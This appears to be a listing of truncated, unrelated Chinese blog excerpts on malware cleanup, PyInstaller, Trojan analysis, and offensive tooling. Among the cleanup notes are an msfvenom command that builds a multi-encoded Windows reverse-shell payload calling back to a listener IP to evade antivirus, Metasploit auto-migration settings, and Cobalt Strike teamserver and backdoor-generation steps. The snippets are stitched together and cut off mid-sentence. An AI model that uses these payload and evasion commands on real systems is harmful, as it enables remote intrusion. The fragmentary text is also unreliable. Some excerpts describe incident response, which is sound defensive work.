## 流氓行经 这几天电脑上突然自动安装pptv,金山毒霸清除了也不管用, 卸载了pptv过一会又自动安装上了,太嚣张了哈. ## 监控进程跟目录变化 接下来使用 ProcessMonitor 监控进程,下载地址 https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon#download DirectoryMonitor监控 C:\Users\cucker\AppData\Local\Temp 目录变化  (这个监控不用也行)…

打包python脚本为exe的坎坷经历, by pyinstaller方法 又应验了那句歌词. 不经历风雨, 怎么见得了彩虹. 安装过程略去不提, 仅提示: pip install pyinstaller 打包指令 粗看包里的文档, 然后开始打包: 打开console 就用了这个命令: pyinstaller monitor_rt_quotes.py 结果就是比预期麻烦的多的多的: 干活, 硬盘不停地balabala叫, 漫长 这里记录一下控制台显示的提示信息: 官方文档对上述指令的解释为: |…

昨天发现 一台服务器突然慢了 top 显示 几个进程100%以上的cpu使用 执行命令为 : /tmp/php  -s /tmp/p2.conf 基本可以确定是被挂马了 下一步确定来源 last 没有登陆记录 先干掉这几个进程,但是几分钟之后又出现了 先看看这个木马想干什么吧 netstat 看到 这个木马开启了一个端口和国外的某个ip建立了连接 但是tcpdump了一小会儿 没有发现任何数据传递 这他是想干啥? 继续查看日志吧 在cron日志中发现了www用户 有一个crontab定时操作 基…

首先表示强烈谴责,没事写出这种木马来.导致开发者把时间花在解决这种问题上. 这种木马会在你全盘的html文件的最底部生成一堆vbscript代码,导致html文件变得很大.大概213kb.可以看出他就是在恶搞. 如图: 你写好的html,过段时间就变成这样了.前端开发表示简直心态爆炸. 解决方案: 1.至以下链接处下载ATTK扫描工具: http://support.trendmicro.com.cn ... stomizedpackage.exe (32位) http://support.tr…

1.查看流量图发现问题 查看的时候网页非常卡,有的时候甚至没有响应 2.top动态查看进程 我马上远程登录出问题的服务器,远程操作很卡,网卡出去的流量非常大,通过top发现了一个异常的进程占用资源比较高,名字不仔细看还真以为是一个Web服务进程. 4.结束异常进程并继续追踪 killall -9 nginx1 rm -f /etc/nginx1 干掉进程之后,流量立刻下来了,远程也不卡顿了,难道删掉程序文件,干掉异常进程我们就认为处理完成了么?想想也肯定没那么简单的,这个是木马啊,肯定还会自己生…

> elsave.exe -h usage: elsave [-s \\server] [-l log] [-F file] [-C] [-q] Saves and/or clears a Windows NT event log. Version 0.4 19980907. -s \\server Server for which you want to save or clear the log. -l log Name of log to save or clear. -F file Sa…

相信经常玩木马的朋友们都会知道一些木马的特性,也会有自己最喜爱的木马,不过,很多朋友依然不知道近年兴起的“DLL木马”为何物.什么是“DLL木马”呢?它与一般的木马有什么不同? 一.从DLL技术说起 要了解DLL木马,就必须知道这个“DLL”是什么意思,所以,让我们追溯到几年前,DOS系统大行其道的 日子里.在那时候,写程序是一件繁琐的事情,因为每个程序的代码都是独立的,有时候为了实现一个功能,就要为此写很多代码,后来随着编程技术发展,程序员 们把很多常用的代码集合(通用代码)放进一个独立的文件…

链接:https://pan.baidu.com/s/1qstCSM9nO95tFGBsnYFYZw 提取码:w6ih  上面是工具 需要java jdk 在1.8.5 以上  实验环境windows 在K8_CS_3.12\cobaltstrike  目录下允许cmd  在cmd 执行 TeamServer.exe 192.168.11.247 你的密码 回车 点击CobaltStrike.exe(win) 添加监听列表 步骤 cobalt strike-->listeners-->add…

Sn.exe(强名称工具) .NET Framework 4.5   强名称工具 (Sn.exe) 有助于使用强名称对程序集进行签名. Sn.exe 提供了用于密钥管理.签名生成和签名验证的选项. 强名称工具自动随 Visual Studio 一起安装. 若要启动该工具,请使用 Visual Studio 命令提示.  说明 在 64 位计算机上,既可以使用 Visual Studio 命令提示符运行 Sn.exe 的 32 位版本,也可以使用 Visual Studio x64 Win64 命…

Msf生成木马:(多层加密都不能免杀) msfvenom -p windows/shell_reverse_tcp lhost=192.168.33.143 lport=7001 -f raw -e x86/shikata_ga_nai -i 7 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -…

在前一篇文章中我讲了什么是Meterpreter,并且讲解了Meterpreter的用法.传送门-->Metasploit之Meterpreter 今天我要讲的是我们用Msfvenom制作一个木马,发送给其他主机,只要其他主机运行了该木马,就会自动连接到我们的主机,并且建立一条TCP连接.我们可以通过这条TCP连接控制目标主机. Msfvenom –p (- -payload-options):添加载荷payload.载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后…

监听 AutoRunScrip:自动执行脚本 如:自动执行post/windows/manage/migrate set AutoRunScript post/windows/manage/migrate set autorunscript migrate -f #获取shell后,将自动迁移到另一个进程 自动注入进程 set prependmigrate true set prependmigrateProc svchost.exe 免杀 将控制端向被控制端发送的stage进行编码,从而绕过s…

一.服务器搭建与连接(1)团队服务器上: sudo ./teamserver 服务器IP 连接密码 (VPS的话要写外网ip,并且可以进行端口映射,默认使用50050端口) 但是这个一关闭团队服务器也就关闭了,这里我们可以把他置于后台来运行: nohup ./teamserver IP 用户名 & 这样就可以了,这个目录下会生成一个nohup.out的文件内存使用超过%50 无法启动java虚拟机.在结束Cobalt Strike的时候也要同时结束所有 msfrpcd 进程,不要下次启动会启动不…

参考链接: https://www.ezreal.net/archives/166.htmlhttp://blog.cobaltstrike.com/category/cobalt-strike-2/ cobaltstrike作者博客https://wujunze.com/wooyun/drops/Cobalt%20Strike%20之团队服务器的搭建与DNS通讯演示.html   cobalt strike从3.0 开始,不再依赖于Metasploit框架而是作为一个独立的平台使用.本次服务器…

最近非常流行的一个病毒,将电脑或者U盘里的文件全部用快捷方式替换,真实文件被隐藏起来,下面我们就具体了解下此种病毒吧,做好预防与杀毒工作. 一.病毒名称 病毒名称:移动盘同名文件夹病毒;文件夹EXE病毒;同名文件夹EXE病毒 木马名称:Worm.Win32.AutoRun.soq 二.中毒特征 移动盘中毒后,移动盘中的所有文件夹被隐藏起来,病毒伪装成文件夹,但露出了尾巴,也就是露出了它的扩展名exe,因为我见到的文件夹一般是没有扩展名的,而且你可以往里面放东西的,所以,见到exe你应该想到它不是…

0X01 环境准备 Cobalt Strike安装包(链接:https://pan.baidu.com/s/1wCHJcJrF6H0wUCdetz3Xjg 提取码:rjuj) Cobalt Strike服务端:kali(不限于kali,但需要时Linux系统) Cobalt Strike客户端:Windows 7 0X02 Cobalt Strike介绍 ​ Cobalt Strike是一款美国 Red Team 开发的渗透测试平台,大佬们都称之为 "CS " (后面为了描(tou)述…

Cobalt Strike安装 系统要求 Cobalt Strike要求Java 1.8,Oracle Java ,或OpenJDK . 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用 #团队服务器 Cobalt Strike 分为客户端组件和服务器组件.服务器组件,也就是团队服务器,是 Beacon payload 的控制器,也是 Cobalt Strike 社会工程功能的托管主机.团队服务器还存储由 Cobalt Strike 收集的数据,并管理日志记录.…

出品|MS08067实验室(www.ms08067.com) 本文作者:BlackCat(Ms08067内网安全小组成员) CobalStrike 4.0 生成后门几种方式 步骤:Attacks-〉Packages-〉如下: HTML Application 生成恶意的HTA木马文件 MS Office Macro 生成office宏病毒文件 Payload Gene rator 生成各种语言版本的payload; Windows Executable 生成可执行exe木马: Windows E…

Cobalt Strike使用教程一     0x00 简介 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器.自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透. Cobalt Strike集成了端口转发.服务扫描,自动化溢出,多模式端口监听,w…

> 前言 内存缓冲区溢出又名 Buffer OverFlow,是一种非常危险的漏洞,在各种操作系统和应用软件中广泛存在.利用缓冲区溢出进行的攻击,小则导致程序运行失败.系统宕机等后果,大则可以取得系统特权,甚至是运行特定代码,正是因为其隐秘不易发现的性质,广泛受到 APT 组织的青睐.随着缓冲区溢出的出现,各大系统和软件厂商都积极的采取了相应的防范措施,建立了一系列的应急响应中心,比如微软.腾讯.Adobe.谷歌.360等,导致现在挖掘缓冲区溢出漏洞变得越来越难,在如今一个能够做到完美利用的缓冲…

目录 排查用户相关的信息 排查进程端口相关的信息 查找恶意程序并杀掉 斩草除根 判断入侵方式,修复漏洞 当我们被告知一台Linux服务器被黑客入侵,黑客利用该服务器进行挖矿,并且在该服务器上放置了木马后门.现在我们需要对该服务器做排查,关闭和清除掉挖矿程序以及木马后门,探测出黑客是通过什么方式入侵该服务器的,并且最后要将该漏洞进行修补,以确保服务器的正常运行. 首先,当我们登陆主机后做的第一件事,应该先使用 history 查看主机的历史命令,虽然大部分黑客在入侵后会删除使用过的命令,但是不排除…

关于cobalt strike,火起来也有好几年了,首先感谢大佬们慷慨相助愿意在网上分享和翻译相关资料,让这么好的渗透测试框架工具被更多人知道 那就来整理一下在使用这个框架的过程中我认为需要了解的小知识点 cobalt strike简称CS,是一款GUI框架式的渗透测试工具,集成了很多功能 最大的特点是可以团战,有一个服务器,多个客户端,每个客户端就是一个攻击者,攻击者通过连接到服务端来共享攻击资源和目标信息甚至session,服务器必须是Linux系统的 使用的大致流程是:创建团队服务器->客…

by Chesky ##目录 ####一.NTFS交换数据流(ADS)简介 ####二.ADS应用 写入隐藏文件(文本\图像\可执行文件) ADS在Windows平台下的利用--写入后门 ADS在Web中的利用--Get shell(待完成) ####三.NTFS交换数据流在CTF中的应用--查看ADS内容 ####四.清除ADS ##Content ####一.NTFS交换数据流(ADS)简介 在NTFS文件系统中存在着NTFS交换数据流(Alternate Data Streams,简称AD…

如题,先是装了vs2015,开发什么的都没有问题,后来安装了SqlServer2016 MSSM,出大问题了,vs2015打开就报错,具体错误如上,还想还有个ActivityLog.xml 这个文件的问题,微软自家东西互相冲突,蛋疼,都要准备重装了,网上看来一条命令, D:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE λ .\devenv.exe /resetuserdata 清除之后,就可以用了,不过登录数据等都没有…

catalogue . 恶意程序概述 . 模块分解 . 通信协议 . 木马清理 1. 恶意程序概述 Trojan.Chikdos.A是一个木马,它允许远程攻击者利用受感染计算机发动DDoS攻击 . 木马执行时,它创建下列文件 %ProgramFiles%\DbProtectSupport\fake.cfg %ProgramFiles%\DbProtectSupport\svchost.exe . 木马创建以下属性的服务 Display Name: LocalSystem Image Path:…

本文转载自: http://blogs.360.cn/360mobile/2016/10/24/android_escape/ 摘    要 传统逃逸技术涉及网络攻防和病毒分析两大领域,网络攻防领域涉及的逃逸技术主要为网络入侵逃逸技术,病毒分析领域涉及到的逃逸技术主要包括针对静态分析.动态分析的木马逃逸技术. 本文介绍的Android木马逃逸技术研究了针对用户感知.杀软查杀.沙箱动态养殖和人工分析的各种逃逸技术. 大多数Android木马的作恶途径是长期留存用户终端,通过持续性作恶获取收益. 为…

(一) 学习过程: 整个过程分为两个部分: 第一:将TC2.0的环境使用虚拟软盘复制到DOS虚拟机中: 打开WinImage,fileànew,由于TC2.0的环境解压后为2.02M,所以我们在Standard format中选择2.88M. 将TC文件夹放入.保存. 在DOS虚拟机中加载做好的软盘.这时A:\内有TC2.0的所有文件了. 此处援引书中的话: 我们在把一个程序拷贝的一个空的目录后,这个目录下只有这一个程序,然后我们运行它,它可以正确运行,我们就认为这个程序在运行中不需要别的文件.…

1.最小权限原则,只允许用户做****,而不是"不允许用户做****"2.浏览器查看的是服务端代码的执行输出的文本,除非服务器有漏洞,否则浏览者无法查看 服务端的ASPX,CS代码,目标另存为也是保存ASPX的执行结果,而看不到ASPX的源代码, JS,HTML是被输出到浏览器上执行的,因此无法禁止浏览者查看JS,HTML3.C#代码是运行在服务器端的,JS代码是运行在浏览器客户端的4.能在浏览器端完成的事情,就不要到服务端去做5.客户端是不可信的6.能直接将生成的内容以流的形式输出给…

什么是ASP.Net: ASP.Net是一种动态网页技术,在服务器端运行.Net代码,动态生成HTML.可以使用javascript.Dom在浏览器端完成很多工作,但是有很多工作无法在浏览器端完成,比如存储数据.访问数据库.复杂的业务逻辑运算.安全性要求高的逻辑运算等. WebApplication(Web应用程序)和WebSite(网站)的区别,WebSite是为了兼容从ASP转过来的开发人员的习惯而存在的,用起来简单,比如不需要创建命名空间.cs代码修改以后不需要重启就能看到变化(无论是We…

server升级了一下系统补丁(360安装),所有发现.net无法打开网站,提示" 因为无法创建应用程序域,因此未能运行请求.错误: 0x80070002 系统找不到指定的文件. ",可是php和asp是正常的,所以确定应该是.net framework坏掉了. 搜索一下网上答案各异.有些说是补丁问题,有些是没卸载干净.net framework导致的,有些是注冊表IE浏览器没权限,有些是目录文件没有权限.. . 试过好多方法,比方cleanup_tool.exe全然清除还是安装不了.…